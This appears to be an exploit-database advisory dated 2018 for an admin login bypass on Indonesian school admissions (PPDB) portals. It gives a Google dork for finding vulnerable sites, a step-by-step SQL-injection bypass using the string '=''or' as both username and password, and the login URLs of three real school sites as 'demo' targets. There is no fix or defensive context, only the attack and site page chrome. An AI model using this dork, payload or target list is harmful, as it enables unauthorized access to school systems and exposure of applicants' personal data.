Indonesian School PPDB Admin Login Bypass

2018.06.17

0N3R1D3R (ID)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/login.php PPDB. Beranda (current) · Pendaftar Sementara(current). Selamat datang Admin PPDB

***************************************************
# Exploit Title: Indonesian School PPDB Admin Login Bypass
# Google Dork: inurl:/login.php PPDB. Beranda (current) · Pendaftar Sementara(current). Selamat datang Admin PPDB
# Date: 17/06/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Enter username and password with
[+] Username: '=''or'
[+] Password: '=''or'
[+] Vuln? You redirected to dashboard
***************************************************
[+] Demo Site
[+] http://ppdb.sman3lebong.sch.id/login.php
[+] http://ppdb.mtsn3subang.sch.id/login.php
[+] https://ppdb.smkppntanjungsari.sch.id/login.php
***************************************************
Thanks To Error Violence

References:

Personal research

See this note in RAW Version

Vote for this issue:

85%

15%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Indonesian School PPDB Admin Login Bypass

Dork: inurl:/login.php PPDB. Beranda (current) · Pendaftar Sementara(current). Selamat datang Admin PPDB

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.